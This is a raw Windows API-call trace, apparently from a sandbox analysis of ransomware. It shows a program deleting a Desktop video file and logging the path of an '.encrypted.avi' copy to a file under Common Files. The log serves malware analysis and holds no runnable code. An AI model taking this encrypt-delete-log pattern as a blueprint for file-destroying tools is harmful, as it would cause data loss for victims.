lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.934] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.934] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.934] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.935] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.935] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.935] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\seoyhlx7cev1ilpfdx.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.936] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.937] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.937] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.937] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.937] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.937] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.938] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpFilePart=0x0) returned 0x4f [0030.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0x12528540, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 0x7c2100 [0030.938] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\seoyhlx7cev1ilpfdx.avi")) returned 1 [0030.939] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0x12528540, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 0 [0030.939] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.941] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.941] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.949] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.949] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.949] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.949] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.950] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.950] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.950] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.950] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.950] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.951] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.951] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x5e3, lpOverlapped=0x0) returned 1 [0030.951] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.951] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x5e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.951] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.encrypted.avi\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0030.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5c) returned 0x87a9d8 [0030.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.encrypted.avi\r\n", cchWideChar=92, lpMultiByteStr=0x87a9d8, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.encrypted.avi\r\n", lpUsedDefaultChar=0x0) returned 92 [0030.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0030.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0030.952] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5b, lpOverlapped=0x0) returned 1 [0030.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0030.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.952] CloseHandle (hObject=0x140) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.954] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 